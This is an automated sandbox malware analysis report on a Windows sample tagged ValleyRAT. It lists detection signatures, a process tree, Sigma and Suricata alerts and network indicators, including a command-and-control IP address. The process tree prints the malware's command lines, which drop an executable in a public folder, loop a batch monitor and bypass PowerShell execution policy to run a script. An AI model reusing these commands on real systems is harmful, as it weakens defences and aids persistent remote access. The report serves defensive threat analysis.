Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
S1Rv3ioghk.exe

Overview

General Information

Sample name:S1Rv3ioghk.exe
renamed because original name is a hash value
Original sample name:FD7EC2C34E2593E4D606E0A9D37E257A.exe
Analysis ID:1581258
MD5:fd7ec2c34e2593e4d606e0a9d37e257a
SHA1:aac4d5282290c1da30acbf00703c02c5e6ee4b6e
SHA256:17a742ca6bd9bd88de4f83074d17d1f74faec1b04d177bef710229c77d9e6e21
Tags:exeValleyRATuser-abuse_ch
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected unpacking (creates a PE file in dynamic memory)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
AI detected suspicious sample
Bypasses PowerShell execution policy
Connects to many ports of the same IP (likely port scanning)
Contains functionality to capture and log keystrokes
Contains functionality to inject code into remote processes
Contains functionality to inject threads in other processes
Loading BitLocker PowerShell Module
Sigma detected: Execution from Suspicious Folder
Sigma detected: Parent in Public Folder Suspicious Process
Sigma detected: Suspicious Program Location with Network Connections
AV process strings found (often used to terminate AV products)
Checks for available system drives (often done to infect USB drives)
Contains functionality for read data from the clipboard
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to clear windows event logs (to hide its activities)
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
Installs a global mouse hook
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Change PowerShell Policies to an Insecure Level
Sleep loop found (likely to delay execution)
Stores large binary data to the registry
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • S1Rv3ioghk.exe (PID: 6364 cmdline: "C:\Users\user\Desktop\S1Rv3ioghk.exe" MD5: FD7EC2C34E2593E4D606E0A9D37E257A)
    • cmd.exe (PID: 2828 cmdline: "C:\Windows\System32\cmd.exe" /c start C:\Users\Public\Bulete\program\ShellExperienceHosts.exe MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 5244 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • ShellExperienceHosts.exe (PID: 5868 cmdline: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe MD5: 0922B22053A6D5D9516EA910D34A4771)
        • cmd.exe (PID: 4312 cmdline: cmd.exe /B /c "C:\Users\user\AppData\Local\Temp\\monitor.bat" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 744 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • tasklist.exe (PID: 5816 cmdline: tasklist /FI "IMAGENAME eq ShellExperienceHosts.exe" MD5: 0A4448B31CE7F83CB7691A2657F330F1)
          • findstr.exe (PID: 3412 cmdline: findstr /I "ShellExperienceHosts.exe" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
          • timeout.exe (PID: 5228 cmdline: timeout /t 30 /nobreak MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
          • tasklist.exe (PID: 1988 cmdline: tasklist /FI "IMAGENAME eq ShellExperienceHosts.exe" MD5: 0A4448B31CE7F83CB7691A2657F330F1)
          • findstr.exe (PID: 5368 cmdline: findstr /I "ShellExperienceHosts.exe" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
          • timeout.exe (PID: 3588 cmdline: timeout /t 30 /nobreak MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
          • tasklist.exe (PID: 4940 cmdline: tasklist /FI "IMAGENAME eq ShellExperienceHosts.exe" MD5: 0A4448B31CE7F83CB7691A2657F330F1)
          • findstr.exe (PID: 2852 cmdline: findstr /I "ShellExperienceHosts.exe" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
          • timeout.exe (PID: 4548 cmdline: timeout /t 30 /nobreak MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
          • tasklist.exe (PID: 6296 cmdline: tasklist /FI "IMAGENAME eq ShellExperienceHosts.exe" MD5: 0A4448B31CE7F83CB7691A2657F330F1)
          • findstr.exe (PID: 6264 cmdline: findstr /I "ShellExperienceHosts.exe" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
          • timeout.exe (PID: 6448 cmdline: timeout /t 30 /nobreak MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
        • cmd.exe (PID: 2488 cmdline: cmd.exe /C powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 5516 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 6104 cmdline: powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • cmd.exe (PID: 5428 cmdline: cmd.exe /C powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\updated.ps1 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 5912 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 6692 cmdline: powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\updated.ps1 MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

System Summary

barindex
Sigma detected: Execution from Suspicious Folder
Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe, CommandLine: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe, CommandLine|base64offset|contains: , Image: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe, NewProcessName: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe, OriginalFileName: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c start C:\Users\Public\Bulete\program\ShellExperienceHosts.exe, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 2828, ParentProcessName: cmd.exe, ProcessCommandLine: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe, ProcessId: 5868, ProcessName: ShellExperienceHosts.exe
Sigma detected: Parent in Public Folder Suspicious Process
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: cmd.exe /C powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser", CommandLine: cmd.exe /C powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe, ParentImage: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe, ParentProcessId: 5868, ParentProcessName: ShellExperienceHosts.exe, ProcessCommandLine: cmd.exe /C powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser", ProcessId: 2488, ProcessName: cmd.exe
Sigma detected: Suspicious Program Location with Network Connections
Source: Network ConnectionAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: DestinationIp: 118.107.44.112, DestinationIsIpv6: false, DestinationPort: 18852, EventID: 3, Image: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe, Initiated: true, ProcessId: 5868, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49771
Sigma detected: Change PowerShell Policies to an Insecure Level
Source: Process startedAuthor: frack113: Data: Command: powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser", CommandLine: powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: cmd.exe /C powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 2488, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser", ProcessId: 6104, ProcessName: powershell.exe
Sigma detected: Non Interactive PowerShell Process Spawned
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser", CommandLine: powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: cmd.exe /C powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 2488, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser", ProcessId: 6104, ProcessName: powershell.exe

Suricata Signatures

TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-12-27T09:20:45.215284+010020528751A Network Trojan was detected192.168.2.449782118.107.44.11218091TCP
2024-12-27T09:21:56.244401+010020528751A Network Trojan was detected192.168.2.449793118.107.44.11218091TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Multi AV Scanner detection for dropped file
Source: C:\Users\Public\Bulete\program\yyzyBase.dllReversingLabs: Detection: 82%
Source: C:\Users\user\AppData\Local\Temp\backup.dllReversingLabs: Detection: 82%
Multi AV Scanner detection for submitted file
Source: S1Rv3ioghk.exeVirustotal: Detection: 66%Perma Link
Source: S1Rv3ioghk.exeReversingLabs: Detection: 65%
AI detected suspicious sample
Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.4% probability
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeCode function: 3_2_6C6B8E2D CryptAcquireContextW,CryptImportKey,CryptSetKeyParam,CryptSetKeyParam,CryptDecrypt,CryptDestroyKey,CryptReleaseContext,___std_exception_copy,CryptReleaseContext,___std_exception_copy,CryptDestroyKey,CryptReleaseContext,___std_exception_copy,CryptDestroyKey,CryptReleaseContext,___std_exception_copy,___std_exception_copy,3_2_6C6B8E2D
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeCode function: 3_2_6C6B8792 CryptAcquireContextW,CryptCreateHash,CryptHashData,CryptHashData,CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,CryptReleaseContext,___std_exception_copy,CryptDestroyHash,CryptReleaseContext,___std_exception_copy,CryptDestroyHash,CryptReleaseContext,___std_exception_copy,CryptReleaseContext,___std_exception_copy,CryptDestroyHash,CryptReleaseContext,___std_exception_copy,___std_exception_copy,3_2_6C6B8792
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeCode function: 3_2_6C6B84FC CryptStringToBinaryA,CryptStringToBinaryA,___std_exception_copy,3_2_6C6B84FC
Source: S1Rv3ioghk.exe, 00000000.00000003.1701410511.0000000002F1A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: -----BEGIN PUBLIC KEY-----memstr_fc1d8e85-1

Compliance

barindex
Detected unpacking (creates a PE file in dynamic memory)
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeUnpacked PE file: 3.2.ShellExperienceHosts.exe.3320000.6.unpack
Source: S1Rv3ioghk.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000011.00000002.2548437777.0000000006F32000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\System.Management.Automation.pdbpdbion.pdbp source: powershell.exe, 00000011.00000002.2554932130.00000000080E2000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000011.00000002.2548323378.0000000006F26000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\buildslave\unity\build\artifacts\WindowsPlayer\Win32_VS2019_nondev_i_r\WindowsPlayer_Master_il2cpp_x86.pdb source: S1Rv3ioghk.exe, 00000000.00000003.1701410511.0000000002B40000.00000004.00000020.00020000.00000000.sdmp, ShellExperienceHosts.exe, ShellExperienceHosts.exe, 00000003.00000000.1706516163.000000000040C000.00000002.00000001.01000000.00000005.sdmp, ShellExperienceHosts.exe.0.dr, backup.exe.3.dr
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000011.00000002.2548437777.0000000006F6F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000011.00000002.2528351985.00000000028CF000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ?COMCTL32.dllWINHTTP.dllcompiler: cl /Zi /Fdossl_static.pdb /MT /Zl /Gs0 /GF /Gy /W3 /wd4090 /nologo /O2 -FS -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_BN_ASM_PART_WORDS -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DRC4_ASM -DMD5_ASM -DRMD160_ASM -DAESNI_ASM -DVPAES_ASM -DWHIRLPOOL_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DPOLY1305_ASMLoad file into cachecrypto\x509\by_file.cunspecified certificate verification errorunable to get issuer certificateunable to get certificate CRLunable to decrypt certificate's signatureunable to decrypt CRL's signatureunable to decode issuer public keycertificate signature failureCRL signature failurecertificate is not yet validcertificate has expiredCRL is not yet validCRL has expiredformat error in certificate's notBefore fieldformat error in certificate's notAfter fieldformat error in CRL's lastUpdate fieldformat error in CRL's nextUpdate fieldout of memoryself signed certificateself signed certificate in certificate chainunable to get local issuer certificateunable to verify the first certificatecertificate chain too longcertificate revokedinvalid CA certificatepath length constraint exceededunsupported certificate purposecertificate not trustedcertificate rejectedsubject issuer mismatchauthority and subject key identifier mismatchauthority and issuer serial number mismatchkey usage does not include certificate signingunable to get CRL issuer certificateunhandled critical extensionkey usage does not include CRL signingunhandled critical CRL extensioninvalid non-CA certificate (has CA markings)proxy path length constraint exceededkey usage does not include digital signatureproxy certificates not allowed, please set the appropriate flaginvalid or inconsistent certificate extensioninvalid or inconsistent certificate policy extensionno explicit policyDifferent CRL scopeUnsupported extension featureRFC 3779 resource not subset of parent's resourcespermitted subtree violationexcluded subtree violationname constraints minimum and maximum not supportedapplication verification failureunsupported name constraint typeunsupported or invalid name constraint syntaxunsupported or invalid name syntaxCRL path validation errorPath LoopSuite B: certificate version invalidSuite B: invalid public key algorithmSuite B: invalid ECC curveSuite B: invalid signature algorithmSuite B: curve not allowed for this LOSSuite B: cannot sign P-384 with P-256Hostname mismatchEmail address mismatchIP address mismatchNo matching DANE TLSA recordsEE certificate key too weakCA certificate key too weakCA signature digest algorithm too weakInvalid certificate verification contextIssuer certificate lookup errorCertificate Transparency required, but no valid SCTs foundproxy subject name violationOCSP verification neededOCSP verification failedOCSP unknown certCertificate public key has explicit ECC parametersunknown certificate verification errorcrypto\asn1\x_info.ccrypto\pem\pem_info.cRSA P
Source: Binary string: H:\func_v12_i18n_202411_branch\Build\Release\WPSOffice\office6\addons\konlinesetup_xa\konlinesetup_xa.pdb source: S1Rv3ioghk.exe, 00000000.00000003.1701410511.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, wps_lid.lid-s8HDMqE8a6Xy.exe.0.dr
Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /MT /Zl /Gs0 /GF /Gy /W3 /wd4090 /nologo /O2 -FS -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_BN_ASM_PART_WORDS -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DRC4_ASM -DMD5_ASM -DRMD160_ASM -DAESNI_ASM -DVPAES_ASM -DWHIRLPOOL_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DPOLY1305_ASM source: S1Rv3ioghk.exe, 00000000.00000003.1701410511.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, wps_lid.lid-s8HDMqE8a6Xy.exe.0.dr
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeFile opened: z:Jump to behavior
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeFile opened: x:Jump to behavior
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeFile opened: v:Jump to behavior
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeFile opened: t:Jump to behavior
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeFile opened: r:Jump to behavior
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeFile opened: p:Jump to behavior
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeFile opened: n:Jump to behavior
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeFile opened: l:Jump to behavior
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeFile opened: j:Jump to behavior
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeFile opened: h:Jump to behavior
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeFile opened: f:Jump to behavior
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeFile opened: b:Jump to behavior
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeFile opened: y:Jump to behavior
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeFile opened: w:Jump to behavior
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeFile opened: u:Jump to behavior
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeFile opened: s:Jump to behavior
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeFile opened: q:Jump to behavior
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeFile opened: o:Jump to behavior
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeFile opened: m:Jump to behavior
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeFile opened: k:Jump to behavior
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeFile opened: i:Jump to behavior
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeFile opened: g:Jump to behavior
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeFile opened: e:Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: c:Jump to behavior
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeFile opened: [:Jump to behavior
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeCode function: 3_2_6C7BC637 __EH_prolog3_GS,GetFullPathNameW,PathIsUNCW,GetVolumeInformationW,CharUpperW,FindFirstFileW,FindClose,3_2_6C7BC637
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeCode function: 3_2_033280F0 wsprintfW,GetLogicalDriveStringsW,lstrcmpiW,lstrcmpiW,QueryDosDeviceW,lstrlenW,__wcsnicmp,lstrcpyW,lstrcpyW,lstrcatW,3_2_033280F0

Networking

barindex
Suricata IDS alerts for network traffic
Source: Network trafficSuricata IDS: 2052875 - Severity 1 - ET MALWARE Anonymous RAT CnC Checkin : 192.168.2.4:49782 -> 118.107.44.112:18091
Source: Network trafficSuricata IDS: 2052875 - Severity 1 - ET MALWARE Anonymous RAT CnC Checkin : 192.168.2.4:49793 -> 118.107.44.112:18091
Connects to many ports of the same IP (likely port scanning)
Source: global trafficTCP traffic: 118.107.44.112 ports 18852,18091,1,2,5,8
Source: global trafficTCP traffic: 192.168.2.4:49771 -> 118.107.44.112:18852
Source: Joe Sandbox ViewASN Name: BCPL-SGBGPNETGlobalASNSG BCPL-SGBGPNETGlobalASNSG
Source: unknownTCP traffic detected without corresponding DNS query: 118.107.44.112
Source: unknownTCP traffic detected without corresponding DNS query: 118.107.44.112
Source: unknownTCP traffic detected without corresponding DNS query: 118.107.44.112
Source: unknownTCP traffic detected without corresponding DNS query: 118.107.44.112
Source: unknownTCP traffic detected without corresponding DNS query: 118.107.44.112
Source: unknownTCP traffic detected without corresponding DNS query: 118.107.44.112
Source: unknownTCP traffic detected without corresponding DNS query: 118.107.44.112
Source: unknownTCP traffic detected without corresponding DNS query: 118.107.44.112
Source: unknownTCP traffic detected without corresponding DNS query: 118.107.44.112
Source: unknownTCP traffic detected without corresponding DNS query: 118.107.44.112
Source: unknownTCP traffic detected without corresponding DNS query: 118.107.44.112
Source: unknownTCP traffic detected without corresponding DNS query: 118.107.44.112
Source: unknownTCP traffic detected without corresponding DNS query: 118.107.44.112
Source: unknownTCP traffic detected without corresponding DNS query: 118.107.44.112
Source: unknownTCP traffic detected without corresponding DNS query: 118.107.44.112
Source: unknownTCP traffic detected without corresponding DNS query: 118.107.44.112
Source: unknownTCP traffic detected without corresponding DNS query: 118.107.44.112
Source: unknownTCP traffic detected without corresponding DNS query: 118.107.44.112
Source: unknownTCP traffic detected without corresponding DNS query: 118.107.44.112
Source: unknownTCP traffic detected without corresponding DNS query: 118.107.44.112
Source: unknownTCP traffic detected without corresponding DNS query: 118.107.44.112
Source: unknownTCP traffic detected without corresponding DNS query: 118.107.44.112
Source: unknownTCP traffic detected without corresponding DNS query: 118.107.44.112
Source: unknownTCP traffic detected without corresponding DNS query: 118.107.44.112
Source: unknownTCP traffic detected without corresponding DNS query: 118.107.44.112
Source: unknownTCP traffic detected without corresponding DNS query: 118.107.44.112
Source: unknownTCP traffic detected without corresponding DNS query: 118.107.44.112
Source: unknownTCP traffic detected without corresponding DNS query: 118.107.44.112
Source: unknownTCP traffic detected without corresponding DNS query: 118.107.44.112
Source: unknownTCP traffic detected without corresponding DNS query: 118.107.44.112
Source: unknownTCP traffic detected without corresponding DNS query: 118.107.44.112
Source: unknownTCP traffic detected without corresponding DNS query: 118.107.44.112
Source: unknownTCP traffic detected without corresponding DNS query: 118.107.44.112
Source: unknownTCP traffic detected without corresponding DNS query: 118.107.44.112
Source: unknownTCP traffic detected without corresponding DNS query: 118.107.44.112
Source: unknownTCP traffic detected without corresponding DNS query: 118.107.44.112
Source: unknownTCP traffic detected without corresponding DNS query: 118.107.44.112
Source: unknownTCP traffic detected without corresponding DNS query: 118.107.44.112
Source: unknownTCP traffic detected without corresponding DNS query: 118.107.44.112
Source: unknownTCP traffic detected without corresponding DNS query: 118.107.44.112
Source: unknownTCP traffic detected without corresponding DNS query: 118.107.44.112
Source: unknownTCP traffic detected without corresponding DNS query: 118.107.44.112
Source: unknownTCP traffic detected without corresponding DNS query: 118.107.44.112
Source: unknownTCP traffic detected without corresponding DNS query: 118.107.44.112
Source: unknownTCP traffic detected without corresponding DNS query: 118.107.44.112
Source: unknownTCP traffic detected without corresponding DNS query: 118.107.44.112
Source: unknownTCP traffic detected without corresponding DNS query: 118.107.44.112
Source: unknownTCP traffic detected without corresponding DNS query: 118.107.44.112
Source: unknownTCP traffic detected without corresponding DNS query: 118.107.44.112
Source: unknownTCP traffic detected without corresponding DNS query: 118.107.44.112
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeCode function: 3_2_03323360 recv,timeGetTime,_memmove,3_2_03323360
Source: S1Rv3ioghk.exe, 00000000.00000003.1701410511.0000000002B8E000.00000004.00000020.00020000.00000000.sdmp, ShellExperienceHosts.exe, 00000003.00000003.2415021748.000000000074A000.00000004.00000020.00020000.00000000.sdmp, ShellExperienceHosts.exe.0.dr, backup.exe.3.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDCodeSigningCA-1.crt0
Source: S1Rv3ioghk.exe, 00000000.00000003.1701410511.0000000002B8E000.00000004.00000020.00020000.00000000.sdmp, ShellExperienceHosts.exe, 00000003.00000003.2415021748.000000000074A000.00000004.00000020.00020000.00000000.sdmp, ShellExperienceHosts.exe.0.dr, backup.exe.3.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: S1Rv3ioghk.exe, 00000000.00000003.1701410511.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, S1Rv3ioghk.exe, 00000000.00000003.1703674641.0000000000640000.00000004.00001000.00020000.00000000.sdmp, S1Rv3ioghk.exe, 00000000.00000003.1704068985.0000000003A20000.00000004.00001000.00020000.00000000.sdmp, S1Rv3ioghk.exe, 00000000.00000003.1701410511.0000000002B8E000.00000004.00000020.00020000.00000000.sdmp, ShellExperienceHosts.exe, 00000003.00000003.2415021748.000000000074A000.00000004.00000020.00020000.00000000.sdmp, wps_lid.lid-s8HDMqE8a6Xy.exe.0.dr, ShellExperienceHosts.exe.0.dr, backup.exe.3.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: S1Rv3ioghk.exe, 00000000.00000003.1701410511.0000000002B8E000.00000004.00000020.00020000.00000000.sdmp, ShellExperienceHosts.exe, 00000003.00000003.2415021748.000000000074A000.00000004.00000020.00020000.00000000.sdmp, ShellExperienceHosts.exe.0.dr, backup.exe.3.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: S1Rv3ioghk.exe, 00000000.00000003.1701410511.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, S1Rv3ioghk.exe, 00000000.00000003.1703674641.0000000000640000.00000004.00001000.00020000.00000000.sdmp, S1Rv3ioghk.exe, 00000000.00000003.1704068985.0000000003A20000.00000004.00001000.00020000.00000000.sdmp, S1Rv3ioghk.exe, 00000000.00000003.1701410511.0000000002B8E000.00000004.00000020.00020000.00000000.sdmp, ShellExperienceHosts.exe, 00000003.00000003.2415021748.000000000074A000.00000004.00000020.00020000.00000000.sdmp, wps_lid.lid-s8HDMqE8a6Xy.exe.0.dr, ShellExperienceHosts.exe.0.dr, backup.exe.3.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: S1Rv3ioghk.exe, 00000000.00000003.1701410511.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, S1Rv3ioghk.exe, 00000000.00000003.1703674641.0000000000640000.00000004.00001000.00020000.00000000.sdmp, S1Rv3ioghk.exe, 00000000.00000003.1704068985.0000000003A20000.00000004.00001000.00020000.00000000.sdmp, S1Rv3ioghk.exe, 00000000.00000003.1701410511.0000000002B8E000.00000004.00000020.00020000.00000000.sdmp, ShellExperienceHosts.exe, 00000003.00000003.2415021748.000000000074A000.00000004.00000020.00020000.00000000.sdmp, wps_lid.lid-s8HDMqE8a6Xy.exe.0.dr, ShellExperienceHosts.exe.0.dr, backup.exe.3.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: S1Rv3ioghk.exe, 00000000.00000003.1701410511.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, S1Rv3ioghk.exe, 00000000.00000003.1703674641.0000000000640000.00000004.00001000.00020000.00000000.sdmp, S1Rv3ioghk.exe, 00000000.00000003.1704068985.0000000003A20000.00000004.00001000.00020000.00000000.sdmp, S1Rv3ioghk.exe, 00000000.00000003.1701410511.0000000002B8E000.00000004.00000020.00020000.00000000.sdmp, ShellExperienceHosts.exe, 00000003.00000003.2415021748.000000000074A000.00000004.00000020.00020000.00000000.sdmp, wps_lid.lid-s8HDMqE8a6Xy.exe.0.dr, ShellExperienceHosts.exe.0.dr, backup.exe.3.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
